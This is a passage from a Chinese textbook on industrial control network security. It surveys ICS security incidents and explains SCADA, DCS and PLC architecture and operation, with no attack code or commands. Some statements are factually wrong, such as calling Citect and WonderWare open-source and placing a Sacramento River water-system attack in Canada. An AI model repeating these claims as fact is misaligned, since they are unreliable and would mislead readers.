现场,具有相应数字通信能力的测量控制仪器。它采用规范、公开的通信协议, 把现场总线或以太网作为连接纽带, 从而是现场设备能够相互沟通, 共同完成生 产任务。实现测量和控制是工业控制网络的基本任务, 因此保证数据传输的完整 性、可靠性和实时性尤为重要, 这就要求工业控制网络必须具备相应的实时通信 能力。 从发展历程来看,工业控制网络经历了从现场总线到工业以太网的道路。 现场总线技术产生于 20 世纪 80 年代, 以全数字的通信代替了 4~20mA 电流 的模拟传输方式, 使得控制系统与现场仪表之间不仅能够传输生产过程测量与控 制信息,而且能够传输现场仪表的大量非控制信息(如资产管理、自检等),使 得工业企业的管理控制一体化成为可能。按照国际电工委员会(IEC)对现场总 线(FieldBus)一词的定义, 现场总线是一种应用于生产现场, 在现场设备之间、 现场设备与控制装置之间实现双向、串行、多节点数字通信的技术。现场总线目前存在以下不足: 标准不统一,仅国际标准 IEC 61158 就包含了 8 个类型; 不同总线间不能兼容,无法实现无缝集成; 因总线的专有性,其成本较高; 速度较低,支持的应用有限,不便于和信息网络集成。 工业以太网技术是普通以太网技术在工业控制网络中的延伸, 是指采用与商 用以太网(即 IEEE 802.3 标准) 兼容的技术, 选择适合工业现场环境下的产品构 建的控制网络。表 1.1 对比了工业以太网络设备和商用以太网设备在性能要求方面的不同。 1.2.2 工业控制网络与 IT 网络比较 从大体上看,工业控制网络和传统 IT 网络在网络边缘、体系结构和传输内 容三大方面存在主要的不同。 网络边缘不同: 工业控制系统在地域上分布广阔, 其边缘部分是智能程 度不高的传感器和控制器, 而不是 IT 系统边缘的通用计算机, 两者之间 在物理安全需求上差异很大, 体系结构不同: 工业控制网络的结构纵向高度集成, 主站节点和终端节 点之间是主从关系; 传统 IT 网络则是扁平的对等关系, 两者之间在脆弱 节点分布上差异很大。 传输内容不同: 工业控制网络传输的是工业设备的遥测、遥信、遥控和 遥调信息;而传统 IT 网络传输的内容则纷繁多样。 此外,两者在性能要求、软硬组件和可用性方面也存在很多不同。 在安全方面, 随着“两化融合”(工业化与信息化融合),IT 系统的信息安全 也被融入了工业控制系统安全中。不同于传统的生产安全(Safety),工业控制网 络安全(Security)的目标是防范和抵御攻击者通过恶意行为而人为制造生产事 故、损害或伤亡。可以说, 没有工业控制网络安全就没有工业控制系统的生产安 全。只有保证了系统不遭受恶意攻击和破坏,才能有效地保证生产过程的安全。 虽然工业控制网络安全问题同样是由各种恶意攻击造成的, 但是工业控制网络安 全的问题与传统 IT 网络的安全问题存在很大差异。 1.3 工业控制网络安全现状 本节首先罗列一些近年来发生的典型工业控制网络安全事件, 然后简要介绍根据权威机构中国国家信息安全漏洞共享平台(China National Vulnerability Database,简称 CNVD)2016 年发布的数据,工业控制系统漏洞在 2010 年之后却始终处于增长态势。 2014 年美国 ICS-CERT 所公布的数据中,工业控制安全事件达 632 件,而且 多集中于能源行业(59%)和关键制造业(20%)。由此可见, 工业控制网络正面 临非常严重的安全威胁。近年来, 典型工业控制网络安全问题出现在能源、水利、交通运输、生产制造等多个行业。 能源行业 2000 年,俄罗斯政府声称黑客成功控制了属于 GAzprom 公司的世界最大的天然气输送管道网络。 2001 年,黑客入侵了监管加州多数电力传输系统的独立运行商。 2003 年,美国俄亥俄州 Davis-Besse 的核电厂控制网络内的一台计算机被微软的 SQL Server 蠕虫所感染,导致其安全监控系统停机将近 5 小时。 2007 年, 美国国土安全局的“Aurora”演习中, 针对电力控制系统进行渗透测试, 一台发电机在其控制系统遭到攻击后被物理损坏。 2010 年, “网络超级武器”Stuxnet 病毒针对性地侵入工业控制系统,严重威胁到伊朗布什尔核电站核反应堆的安全运营。 2012 年,伊朗石油部和国家石油公司内部计算机网络遭受病毒攻击,为安全起见,伊朗方面暂时切断了海湾附近哈尔克岛石油设施的网络连接。 2014 年出现的 Havex 是一种专门感染 SCADA 控制系统中的控制软件的恶意 软件, 它先后攻击了欧、美地区的一千多家能源企业。除此之外, 黑客们可通过Havex 成功访问到能源行业的工业控制系统。 2015 年 12 月 23 日, 乌克兰电力网络遭受 BlackEnergy 攻击, 这是首个针对电网的成功攻击案例,导致数十万用户断电数小时。 2017 年 6 月 12 日,安全厂商 ESET 公布一款针对电力变电站系统实施恶意 攻击的工控网络攻击武器 win32/Industroyer,它可以直接控制断路器, 导致变电站断电。 水利和水处理行业 2000 年,澳大利亚一名工程师在应聘一家污水处理厂多次被拒绝后,远程 侵入了该厂的污水处理控制系统, 恶意造成污水处理泵站的故障, 导致超过一千立方米的污水被直接排入河流,导致严重环境污染。 2001 年,澳大利亚的一家污水处理厂由于内部工程师的多次网络入侵,该厂发生了 46 次控制设备功能异常事件。 2005 年,美国水电溢坝事件。 2006 年,黑客从 Internet 攻破了美国哈里斯堡的一处污水处理厂的安全措施,在其系统内植入了能够硬性污水处理操作的恶意程序。 2007 年,攻击者侵入加拿大的一个水利 SCADA 控制系统,通过安装恶意软件破坏了用于控制从 Sacramento 河调水的控制计算机。 2011 年,黑客通过 Internet 操纵美国伊利诺伊州城市供水系统 SCADA,使得其控制的对泵遭到破坏。 交通运输行业 2003 年,CSX 运输公司的计算机系统被病毒感染, 导致华盛顿特区的客货运输中断。 2003 年, 19 岁的 Aaron Caffrey 侵入 Houston 渡口的计算机系统,导致该系统停机。 2008 年,攻击者入侵波兰某城市的地铁系统,通过电视遥控器改变轨道扳道器,导致四节车厢脱轨。 生产制造行业 2005 年, 在 Zotob 蠕虫安全事件中, 尽管在 Internet 与企业网、控制网之间 部署了防火墙,还是有 13 个美国汽车厂由于被蠕虫感染而被迫关闭, 5 万生产工人被迫停工,经济损失超过 140 万美元。 2010 年我国某石化厂, 2011 年某炼油厂的某装置控制系统分别感染Conficker 病毒,造成了控制系统服务器与控制器通信不同程度的中断。 2014 年,某钢铁厂遭到攻击,攻击者的行为导致工控系统的控制组件和整个生产线被迫停止运转,造成重大破坏。 其他 2011 年,微软警告称最新发现的 Duqu 病毒可以从工业控制系统制造商那里收集情报数据。 2012 年,发现攻击多个中东国家的恶意程序 Flame 火焰病毒,他能收集各行业的敏感信息。 1.3.2 工业控制系统安全标准体系 国际上,研究工业控制系统安全的标准化组织有:国际电工委员会(IEC , International Electro Technical Commission)、国际自动化协会(ISA,the International Society of Automation)、美国国家标准技术研究院(NIST ,National Institute of Standards and Technology),以及各个国家的标准化组织和行业协会。 第一部分:走近工业控制系统的禁区 第二章 SCADA 系统和 DCS 系统 2.1 SCADA 系统 本节将重点介绍什么是 SCADA 系统以及 SCADA 系统的软硬件组成和系统结 构。 2.1.1 SCADA 系统介绍 SCADA 系统指的是监视控制与数据采集系统, 它是一种大规模的分布式系统, 用来控制和管理地理位置广域分布的资产, 这些资产一般分散在数千平方米的范 围内。在工业生产过程中, 中央数据采集和集中控制对整个系统运行而言非常重 要, SCADA 系统通常具备这种能力, 并广泛应用在供水工程、污水处理、石油和天然气管网、电力系统和轨道交通系统中。 SCADA 系统控制中心集中监视和控制远距离通信网络中的野外现场节点设 备,包括告警信息和过程状态数据等。中央控制中心依靠从远程站点获取的信息, 生成自动化的或者过程驱动型的监视指令并发送至远程站点, 以实现对远程装置 的实时控制, 这类远程装置就是工业领域的对现场设备的操作, 类似阀门和断路 器的开启/关闭、传感器数据采集和现场环境监视报警等本地作业。 2.1.2 SCADA 系统架构 SCADA 系统主要由一系列远程终端单元(RTU)和中心控制主站系统组成, RTU 收集现场数据, 并通过通信系统回送反馈数据给主站, 主站显示这些采集到 的数据并允许操作员执行过程控制任务。准确的、实时的数据可以用于优化机械 设备的运行和操作工序。其他的优势包括更高效、更可靠等, 最重要的还是可以确保完成各类安全操作,由此带来了比早期自动化系统更低廉的运行成本。SCADA 系统在硬件方面基本包含五个层次或等级: 现场层次的测量仪器、仪表和控制装置; 信号分组终端和 RTU; 通信系统; 主站; 企业内部数据处理机构的后台计算机系统。 RTU 为分布于每一个远程现场模拟传感器或数字传感器提供了一种连接接 口。 通信系统为主站系统和远程站点之间的通信提供了通道。这种通信系统可以 是电力线载波、光纤、短波/超短波、电话线、微波乃至卫星通信。此外,专用 协议和纠错机制被设计用来保证高效和高质的数据传输。 主站(或分布式主站)从各种 RTU 采集数据,并且大多数情况下都提供一 种操作接口用来显示信息和控制远程站点。在大型遥测系统中, 分布式主站从远 方站点汇集信息并将这些信息中继传输给中央控制中心。 软件方面, SCADA 系统软件分为两类, 即专用的商用软件和开源软件。大型 企业为其自身的硬件系统定制开发专用软件, 这类系统通常称为“总控键”解决 方案。在工业自动控制领域, “总控键”解决方案面临的最大问题是用户对系统 提供商具有巨大的依赖性和不可替代性。开源软件系统由于给整个系统带来了协 同互操作性, 从而得到广泛应用。协同互操作能力使得许多不同制造厂商的设备 可以集成到同一个大型系统中。Citect 和 WonderWare 是在 SCADA 系统市场上普 遍使用的两种开源软件包。 SCADA 系统软件的要素包括: 用户界面; 图形显示模块; 告警模块; 趋势分析模块; RTU 或 PLC 接口; 升级模块; 数据访问模块; 数据库; 网络模块; 纠错和冗余设计; 客户端/服务器的分布式处理流程。 最初的 SCADA 系统通过测量仪表、信号灯、条带录音机等采集数据,监视 控制功能则由操作员手动控制各种球形手柄完成。这类设备至今仍然在重型机械 厂、加工车间和大型发电系统中完成监视控制和数据采集功能。虽然第一代 SCADA 系统具有结构简单, 成本低廉的优点, 但是也存在对人员依赖程度高, 无法适应大规模系统、管理困难的突出缺陷。 CPU 和其他电子设备的出现后, SCADA 系统制造商开始将数字电子元器件作 为继电器逻辑器件的一部分。可编程逻辑控制器(PLC)是目前工业部门使用最 广泛的控制器件。随着工厂车间监视和控制更多设备的需求不断增长, PLC 逐步 发展为分布式系统, 并且变得越来越智能化、小型化。 PLC/DCS 型 SCADA 系统的优点如下: 计算机可以记录并存储海量数据; 数据可以根据用户需求的任何形式显示; 地理空间分布很广的成千上万只传感器能够被连接到统一系统中; 操作人员可以在系统中进行实时数据模拟; 多种类型的数据可以通过 RTU 进行收集; 数据可以在任何地方查看,不限于工业现场。 PLC/DCS 型 SCADA 系统的缺点包括: PLC/DCS 型 SCADA 系统相对于第一代控制面板型 SCADA 系统更加复杂; 开发 PLC/DCS 型 SCADA 系统需要多种不同的技术人员, 如系统分析人员 和程序开发人员; 如果连接成千上万个传感器,仍然需要很多线缆,管理困难; 操作人员只能看到 PLC 层次的内容; 随着工业界对小型化、智能化系统需求的不断增长, 新型传感器越来越多地 使用智能 PLC 和 DCS。这些设备被称为智能电子装置(Intelligent Electronic Device, IED)。IED 通过Profibus、DeviceNet 或 Foundation Fieldbus 等现场总线与 PC 连接, 如图 2.3 所示。这种智能电子装置具有足够的智能处理能力来获取数据, 与其他 设备通信并具有独立的程序模块。每一台智能传感装置的硬件主板上具有不止一 种传感器。典型的 IED 装置可以将模拟输入传感器、模拟输出传感器、比例-积 分-微分(Proportion-Integral-Differential, PID)控制器、通信系统和程序存储器集成在同一个设备中。 IED 型 SCADA 系统的优势如下: 所需的连接线缆最少; 操作人员可以直接观测到传感器层次的底层信息; 从 IED 获取的数据将包括类似串口数量、模型数量等现场设备自身配置 参数; 所有装置支持即插即用,因此安装和更换零件更加容易; 更小型化的装置意味着将为数据采集系统节省更多空间。 IED 型 SCADA 系统的缺点则包括: 更加先进的系统需要具备更多专业知识的用户; 传感器自身成本提高; IED 的可靠性更多依赖通信系统。 2.2 DCS 系统 本节主要介绍分布式控制系统的相关知识, 包括基本概念, 组成和系统架构。 2.2.1 DCS 系统介绍 DCS 是指分布式控制系统, 也被称为集散式控制系统, 是工业控制系统的重 要组成部分。DCS 是一个由过程控制级和过程监控级组成的以通信网络为纽带的 多级计算机系统, 综合了计算机、通信、终端显示和控制技术发展起来的新型控 制系统。其基本思想是分散控制、集中操作、分级管理、配置灵活以及组态便捷。 它满足了大型工业生产和日益复杂的过程控制需求,从综合自动化的角度出发, 按功能分散、管理集中的原则构思,采用了多层分级、合作自治的结构形式。 DCS 网络是 DCS 的基础和核心, 它对 DCS 的实时性、可靠性和可扩展性起着 决定性作用。因此, 对于 DCS 网络而言, 它必须满足实时性的要求, 即在确定的 时间限度内完成信息的传输。这里所说的“确定”的时间限度, 是指无论在任何 情况下, 信息传送都能在这个时间限度内完成, 而这个时间限度则是根据被控制 过程的实时性确定的。所以衡量系统网络性能的指标不是网络的速率, 即通常所 说的每秒比特数(bit/s),而是系统网络的实时性, 即能在多长的时间内确保所需信息的传输得以完成。 DCS 具有如下特点。 高可靠性 DCS 采用容错设计, 当某一台计算机出现故障时并不会导致系统丧失其他功 能。此外, 由于系统中各台计算机所承担的任务比较单一,因此可以针对需要实 现的功能采用具有特定结构和软件的专用计算机, 从而提高系统中每台计算机的 可靠性。 开放性 DCS 采用开放式、标准化、模块化和系列化设计, 系统中各台计算机采用局 域网方式通信, 实现信息传输, 当需要改变或者扩充功能时, 可将新增加计算机 方便地连入系统通信网络或从网络中卸下,几乎不影响系统其它计算机的工作。 灵活性 通过组态软件根据不同的流程应用对象进行软硬件组态, 即确定测量与控制 信号及相互间连接关系, 从控制算法库选择适用的控制规律以及从图形库调用基 本图形组成所需的各种监控和报警画面,从而方便地构成所需的控制系统。 易于维护 功能单一的小型或微型专用计算机, 具有维护简单、方面的特点, 当某一局 部或某个计算机出现故障时, 可以在不影响整个系统运行的情况下在线更换, 迅 速排除故障。 协调性 各工作站之间通过通信网络传送各种数据,整个系统信息共享,协调工作, 以完成控制系统的总体功能和优化处理。 控制功能齐全 控制算法丰富,集连续控制、顺序控制和批处理控制于一体,可实现串级、 前馈、解耦、自适应和预测控制等先进控制, 并可方面地加入所需的特殊控制算 法。 2.2.2 DCS 系统架构 DCS 是以微处理器和网络作为基础的集中分散型控制系统。它包括操作员站、 工程师站、监控计算机、现场控制站、数据采集站。通信系统。 操作员站 操作员站是操作人员对生产过程进行显示、监视、操作控制和管理的主要设 备。操作员站提供了良好的人机交互界面, 用以实现集中监视、操作和信息管理 等功能。在一些小型 DCS 系统中, 操作员站兼具工程师站的功能, 在操作员站上也可以进行系统组态和维护的部分或者全部工作。 工程师站 工程师站用于对 DCS 进行离线的组态工作和在线系统监督、控制与维护。工 程师能够借助于组态软件对系统进行离线组态, 并在 DCS 在线运行时, 可以实时地监视通信网络上各工作站的运行情况。 监控计算机 监控计算机通过网络收集系统中各个单元的数据信息, 根据数学模型和优化控制指标进行后台计算,优化控制等,他还用于全系统信息的综合管理。 现场控制站 现场控制站通过现场仪表直接与生产过程相连接, 采集过程变量信息, 并进 行转换和运算等处理, 产生控制信号来驱动现场的执行机构, 最终实现对生产过 程的控制。现场控制站可以控制多个回路, 具有极强的运算和控制功能, 能够自主地完成回路控制任务, 实现反馈控制、逻辑控制、顺序控制和批量控制等功能。 数据采集站 数据采集站与生产过程相连接,对过程非控制变量进行数据采集和预处理, 并对实时数据进一步加工;为操作员站提供数据, 实现对过程的监视和信息存储,为控制回路的运算提供辅助数据和信息。 通信系统 通信系统连接 DCS 的各种操作员站、工程师站、监控计算机、现场控制站、数据采集站等部分, 传递各工作站之间的数据、指令及其他信息, 使整个系统协调一致地工作,从而实现数据和信息资源的共享。 DCS 自下而上通常分为控制级、监控级和管理级, 每级之间分别由控制网络 (Control Net, Cnet)、监控网络(Supervision Net, Snet)、管理网络(Management Net, Mnet)把相应的设备连接在一起, 进行数据和命令的传输。 第三章 PLC 设备技术原理 控制器(Controller)是指按照预定顺序通过改变主电路或控制电路的接线和 改变电路中电阻值来控制电动机的启动、调速、制动和反向的主令装置, 是发布 命令的“决策机构”,完成协调和指挥整个计算机系统的操作。在工业控制系统 中, 常见的控制器有可编程逻辑控制器(PLC)、可编程自动化控制器(PAC)、远 程终端单元(RTU)等。 本章将重点介绍 PLC 设备,包括其基本组成和工作原理,以及其通信技术。 3.1 PLC 设备介绍 在 PLC 问世之前, 继电器控制在工业领域占主导地位。继电器控制系统采用 固定接线的硬件实现控制逻辑, 如果生产任务生产任务或者工艺发生变化, 就必 须重新设计和改变硬件结构, 这样就会造成时间和资金的浪费。另外, 大型控制 系统用继电器、接触器控制, 使用的继电器数量多、体积大、功耗大, 且继电器 触电为机械触点, 工作频率较低, 在频繁动作情况下寿命较短, 容易造成系统故 障,系统的可用性差。1968 年, 美国最大的汽车制造商通用汽车公司(GM 公司) 为了适应汽车型 号不断翻新的需求, 以求在激烈竞争中占得优势地位, 提出以一种新型的控制器 装置取代继电器、接触器控制装置, 并且对未来的新型控制装置做出了具体的设 想——利用计算机的完备功能, 以及灵活性、通用性好等优点, 要求新的控制装 置编程简单, 即使不熟悉计算机的人员也能够很快掌握它的使用技术。为此还拟定了以下公开招标的 10 条技术要求: 编程简单方便,可在现场修改程序。 硬件维护方便,采用插件式结构。 可靠性高于继电器、接触器控制装置。 体积小于继电器、接触器控制装置。 可将数据直接送入计算机。 用户程序存储器容量至少可以扩展到 4KB。 输入可以是交流 115V。 输出为交流 115V,能直接驱动电磁阀、交流接触器等。 通用性强,扩展方便。 成本上可以与继电器、接触器控制系统竞争。 美国数字设备公司(Digital Equipment Corporation, DEC)根据 GM 公司的招 标技术要求,于 1969 年研制出世界上第一台可编程控制器,并在 GM 公司汽车 自动装配生产线上使用且取得成功。其后, 日本、德国相继引入这项新技术, 可编程控制器由此迅速发展起来。 PLC 综合了继电器、接触器控制以及计算机灵活、方便的优点而设计、制造和发展的,因此与其他控制器相比, PLC 具有以下 8 个方面的优点。 高可靠性 PLC 所有的 I/O 接口电路均采用光电隔离,使工业现场的外电与 PLC 内部电 路之间电气隔离。 PLC 各个输入端均采用 R-C 滤波器,其滤波时间常数一般为 10~20ms 。PLC 各模块均采用屏蔽措施,以防止辐射干扰。 PLC 还采用了良好的 开关电源, 并对所有元器件进行严格的筛选。此外, PLC 还有良好的自诊断功能, 一旦电源或其他软、硬件发生异常情况, CPU 立即采用有效措施, 以防止故障扩 大。大型 PLC 还可以采用由双 CPU 构成冗余系统或者由三 CPU 构成表决系统,使得可靠性进一步提高。 通用性强,方便使用 PLC 产品已经系列化和模块化, PLC 的开发制造商为用户提供了品种齐全的 I/O 模块和配套部件。用户在进行控制系统设计时,不需要自己设计和制作硬件 装置, 只需要根据控制要求进行模块的配置。用户所做的工作只是设计满足控制 对象控制要求的应用程序。对于一个控制系统, 当控制要求改变时, 只需要修改程序就能变更控制功能 采用模块化结构,系统组合灵活方便 为了适应各种工业控制, 需要除了单元式的小型 PLC 以外的绝大多数 PLC 均 采用模块化结构。 PLC 的各种部件包括 CPU、电源、 I/O 等均采用模块化设计, 由机架以及电缆将各模块连接起来, 系统的规模和功能可根据用户的需要自行组合。编程语言简单易学,便于掌握 PLC 是由继电器、接触器控制系统发展而来的一种新型的工业自动化控制装 置,其主要使用对象是广大的电气技术人员。为使工程技术人员方便学习和掌握 PLC 的编程, PLC 的开发制造商采用了与继电器、接触器控制原理相似的梯形图 语言。 系统设计周期短 系统硬件的设计任务仅仅是根据对象的控制要求配置适当的模块, 而不是去 设计具体的接口电路, 这样大大缩短了整个设计所花费的时间, 加快了整个工程的进度。 对生产工艺改变适应性强 PLC 的核心部件是微处理器, 它实际是一种工业控制计算机, 其控制功能是 通过软件编程来实现的。当生产工艺发生变化时, 不必改变 PLC 硬件设备, 只需改变 PLC 中的程序,这对现代化的小批量、多品种的生产尤其合适。 安装简单,调试方便,维护工作量小 PLC 控制系统的安装接线工作量比继电器、接触器控制系统少得多, 只需要 将现场的各种设备与 PLC 相应的 I/O 端相连。 PLC 软件设计和调试大多可在实验 室进行, 用模拟实验开关代替输入信号, 其输出状态可观察 PLC 上相应的发光二 极管,也可以另接模拟实验板。模拟调试好后,再将 PLC 控制系统安装到现场, 进行联机调试, 这样既节省时间又很方便。 PLC 本身的可靠性高, 又有完善的自 诊断功能, 一旦发生故障, 可以根据报警信息, 迅速查明原因。如果 PLC 本身发 生故障, 则可用更换模块的方法排除故障。这样提高了维护的工作效率, 以保证 生产的正常进行。 I/O 接口模块丰富 PLC 针对不同的工业现场信号(如交流和直流、开关量和模拟量、电压和电 流、脉冲或电位和强电或弱电等)有相应的 I/O 模块与工业现场的器件或设备(如 按钮、行程开关、接近开关、传感器及送变器、电磁线圈和控制阀)直接连接。 另外为了提高操作性能, 它还有多种人机对话的接口模块; 为了组成工业局部网络,它还有多种通信联网的接口模块,等等。 随着大规模集成电路技术的迅猛发展, 功能更强大、规模不断扩大而价格日趋低廉的元器件不断涌现, 促成 PLC 产品亦随之功能大增但成本下降。目前 PLC的应用已经远远超越了早期仅用于开关量控制的局面, 其应用领域主要包括以下5 个方面。 开关量逻辑控制 这是 PLC 最广泛的应用。开关量逻辑控制已经逐步取代传统的继电器逻辑控 制装置, 被应用于单机或者多机控制系统以及自动生产线上。 PLC 控制开关量的 能力非常强, 所以控制的入、出点数有时可多达几万点。由于可以联网, 所以点 数几乎不受限制。所控制的如组合的、时序的、要考虑延时的、需要进行高速计数等的逻辑问题都可以解决。 运动控制 目前许多厂商已经开发出大量的运动控制模块, 且功能是给步进电动机或者 伺服电动机等提供单轴或多轴的位置控制, 并在控制中满足适当的速度和加速度,以保证运动的平滑水准。 过程控制 当前 PLC 产品中,还有一大类是针对生产过程参数,如温度、流量、压力、 速度等的检测和控制而设计的。常用的有模拟量 I/O 模块, 通过这些模块不仅可 以实现 A/D 和 D/A 转换,还可以进一步构成闭环, 实现 PID一类的生产过程调节。 而针对 PID 闭环调节, 又有专门的模块, 可以更方便地实施。这些产品往往还引入了智能控制。 数据处理 现代的 PLC 已具有数据传送、排序、查表搜索、位操作以及逻辑运算、函数 运算、矩阵运算等多种数据采集、分析、处理功能。目前还有不少公司, 将 PLC 的数据处理功能与计算机数值控制(CNC)设备的功能紧密结合在一起, 开发了用于 CNC 的 PLC 产品。 通信 随着网络的发展和计算机集散控制系统的逐步普及, PLC 的网络化通信产品 也在大量被推出。这些产品解决了 PLC 之间、 PLC 与其扩展部分之间、 PLC 与上级计算机之间或其他网络间的通信问题。需要注意的是, 并非所有 PLC 都具有上述全部功能, 越小型的 PLC 其功能相应也越少。 3.2 PLC 设备基本组成和工作原理 本节将介绍 PLC 设备的基本组成和工作原理。 3.2.1 基本组成 典型 PLC 的组成如图 3.1 所示, 分别是中央处理单元(CPU)、存储器、输入/输入(I/O)模块、电源和编程器,下面将对其进行详细介绍。 中央处理单元 中央处理单元是 PLC 的控制中枢。它按照 PLC 系统程序赋予的功能接收并存 储从编程器键入的用户程序和数据:检查电源、存储器、 I/O 以及警戒定时器的 状态, 并能诊断用户程序中的语法错误, 当 PLC 投入运行时, 首先它以扫描的方 式接收现场各输入装置的状态和数据, 并分别存入 I/O 映像区, 然后从用户程序 存储器中逐条读取用户程序, 经过命令解释后将按照指令规定执行的逻辑或算数 运算结果送入 I/O 映像区或数据寄存器内。等所有的用户程序执行完毕之后, 最 后将 I/O 映像区的各种输出状态或输出寄存器内的数据传送到相应的输出装置,如此循环运行,直到停止运行。为了进一步提高 PLC 的可靠性,近年来对大型 PLC 还采用双 CPU 构成的冗 余系统,或者采用三 CPU 的表决式系统。这样,即使某个 CPU 出现故障,整个 系统仍能正常运行。 存储器 存放系统软件的存储器成为系统程序存储器, 存放应用程序软件的存储器称为用户程序存储器。 PLC 常见的存储器类型主要有 RAM、EPROM 和 EEPROM。RAM(Random Access Memory)是一种读/写存储器(随机存储器)。用户可以用编程器读出 RAM 中的 内容,也可以将用户程序写入 RAM。它是易失性的存储器,将它的电源断开后 存储器的信息将会丢失。 EPROM(Erasable Programmable Read Only Memory), 是一种可擦除的只读存储器, 在断电情况下存储器内的所有内容保持不变(在紫 外线连续照射下可以擦除存储器内容) 。 EEPROM (Electronic Erasable Programmable Read Only Memory),是一种电可擦除的只读存储器。使用编程器就能够很容易地对其所存储的内容进行修改。 关于 PLC 的存储空间分配, 虽然各种 PLC 的 CPU 的最大寻址空间各不相同, 但是根据 PLC 的工作原理其存储空间一般包括以下 3 个区域:系统程序存储区、系统 RAM 存储区(包括系统 I/O 映像区和系统软设备区)和用户程序存储区。 系统程序存储区中存放着相当于计算机操作系统的系统程序, 包括监控程序、 管理程序、命令解释程序、功能子程序、系统诊断子程序等。这些都被制造厂商固化在 EPROM 中,用户不能直接存取。它们和硬件一起决定了该 PLC 的性能。 系统 RAM 存储区包括系统 I/O 映像区和系统中各类软设备(如逻辑线圈、数据寄存器、计数器、计时器、变址寄存器、累加器等存储器存储区)。 由于 PLC 投入运行后,只是在输入采样阶段才依次读入各输入状态和数据, 在输出刷新阶段才将输出状态和数据送至相应的外设。因此, 它需要一定数量的 存储单元(RAM)以存放 I/O 的状态和数据,这些单元即被称作 I/O 映像区。 一 个开关量 I/O 占用存储单元中的一个位(bit),一个模拟量 I/O 占用存储单元中 的一个字(16bit)。因此整个 I/O 映像区可看作由两个部分组成:开关量 I/O 映像区和模拟量 I/O 映像区。 除了 I/O 映像区以外,系统 RAM 存储区还包括 PLC 内部各类软设备的存储 区。该存储区又分为具有失电保持的存储区域和无失电保持的存储区域。前者在 PLC 断电时由内部的锂电池供电, 数据不会丢失; 后者当 PLC 断电时, 数据被清 零。与开关输出一样,每个逻辑线圈占用系统 RAM 存储区中的一位,但不能直 接驱动外设,只供用户在编程中使用,其作用类似于电器控制线路中的继电器。 另外, 不同的 PLC 还提供数量不等的特殊逻辑线圈, 具有不同的功能。与模拟量I/O 一样, 每个数据寄存器占用系统 RAM 存储区中的一个字(16bit)。另外, PLC还提供数量不等的特殊数据寄存器,具有不同的功能。用户程序存储区的区别在于它是用来存放用户编制的用户程序。不同类型的PLC 其存储容量各不相同。 电源模块 电源模块为机架上的其他模块提供直流电源。 PLC 的电源在整个系统中起着 十分重要的作用。如果没有一个良好的、可靠的电源系统是无法正常工作的, 因 此 PLC 的制造商对电源的设计和制造也十分重视。 一般交流电压波动在正负 10%或正负 15%范围内,可以不采用其他措施而将 PLC 直接连接在交流电网上。 3.2.2 工作原理 最初研制生产的 PLC 主要用于代替继电器、接触器构成的传统控制装置, 但 这两者的运行方式并不是相同的。继电器控制装置采用硬逻辑并行运行的方式, 即如果这个继电器的线圈通电或断电, 该继电器所有的触点(包括其常开或常闭 触点) 无论在继电器控制线路的哪个位置上都会立即同时动作。PLC 的 CPU 则采 用顺序逻辑扫描用户程序的运行方式, 即如果一个输出线圈或逻辑线圈被接通或 断开, 该线圈的所有触点(包括其常开或常闭触点) 不会立即动作, 必须等扫描到该触点时才会动作。 为了消除二者之间由于运行方式不同而造成的差异, 考虑继电器控制装置各 类触点的动作时间一般在 100ms 以上,而 PLC 扫描用户程序的时间一般均小于 100ms,因此,PLC 采用了一种不同于一般微型计算机的运行方式——扫描技术。 这样,对于 I/O 响应要求不高的场合, PLC 与继电器控制装置的处理结果就没有什么区别了。 扫描技术 当 PLC 投入运行后, 其工作过程一般分为 3 个阶段, 即输入采样、用户程序 执行和输出刷新 3 个阶段。完成上述 3 个阶段称作一个扫描周期。在整个运行期间, PLC 的 CPU 以一定的扫描速度重复执行上述 3 个阶段。在输入采样阶段, PLC 以扫描方式依次读入所有输入状态和数据, 并将它们存入 I/O 映像区中的相应单元内。输入采样结束后, 转入用户程序执行和输出刷新阶段。在这两个阶段中,即使输入状态和数据发生变化, I/O 映像区中的相应 单元的状态和数据也不会改变。因此, 如果输入是脉冲信号, 则该脉冲信号的宽度必须大于一个扫描周期,才能保证在任何情况下该输入均能被读入。 在用户程序执行阶段, PLC 总是按由上而下的顺序依次扫描用户程序(梯形 图)。在扫描每一条梯形图时,又总是先扫描梯形图左边的由各触点构成的控制 线路,并按先左后右、先上后下的顺序对由触点构成的控制线路进行逻辑运算, 然后根据逻辑运算的结果, 刷新该逻辑线圈在系统 RAM 存储区中对应位的状态; 或者刷新该输出线圈在 I/O 映像区中的对应位的状态; 或者确定是否要执行该梯形图所规定的特殊功能指令。也就是说, 在用户程序执行过程中, 只有输入点在 I/O 映像区内的状态和数 据不会发生变化,而其他输出点和软设备在 I/O 映像区或系统 RAM 存储区内的 状态和数据都有可能发生变化, 而且排在上面的梯形图, 其程序执行结果会对排 在下面的凡是用到这些线圈或数据的梯形图起作用;相反,排在下面的梯形图, 其被刷新的逻辑线圈的状态或数据只能到下一个扫描周期才能对排在其上面的程序起作用。当扫描用户程序结束后, PLC 就进入输出刷新阶段。在此期间, CPU 按照 I/O 映像区内对应的状态和数据刷新所有的输出锁存电路, 再经输出电路驱动相应的 外设,这时才是 PLC 的真正输出。一般来说, PLC 的扫描周期包括自动诊断、通信等,如图 3.2 所示, 一个扫描周期等于自诊断、通信、输入采样、用户程序执行、输出刷新等所有时间的总和。 PLC 的 I/O 响应时间 为了增强 PLC 的抗干扰能力, 提高其可靠性, PLC 的每个开关量输入端都采用光电隔离等技术。为了能实现继电器控制线路的硬逻辑并行控制, PLC 采用了不同于一般微型计算机的运行方式,即扫描技术。上述两个主要原因, 使得 PLC 的 I/O 响应比一般微型计算机构成的工业控制 系统慢得多, 其响应时间至少等于一个扫描周期, 一般均大于一个扫描周期甚至更长。所谓 I/O 响应时间指从 PLC 的某一输入信号变化开始到系统有关输出端信号 的改变所需的时间。 3.3 PLC 设备通信技术 PLC 设备的串行通信采用半双工异步传输模式, 支持 CCM(CommunicationsControl Module)通信协议,并具有以下功能: 上位通信功能 主站功能 一对一功能 无协议串行通信功能 这些功能可以实现 PLC 的寄存器和内部继电器的读入和写出、传送状态的跟踪等。由于 CCM 协议采用主从通信方式,所以通信过程中由主站保持主动权,向子站发出呼叫, 并通过向子站发送命令帧来控制数据传送的方向、格式和内容;子站对得到的主站呼叫做出响应,并根据命令帧要求进行数据传输。 数据传输过程以主站向子站写入数据为例, 通信从主站向子 站提出呼叫开始, 子站做出应答从而建立连接, 主站接到应答后, 向子站发送首 标,子站将依据首标各项要求与主站进行数据传输, 在子站在此做出应答后, 主 站开始发送数据, 数据以固定长度的分组方式进行传输, 最后主站发送 EOF(End Of 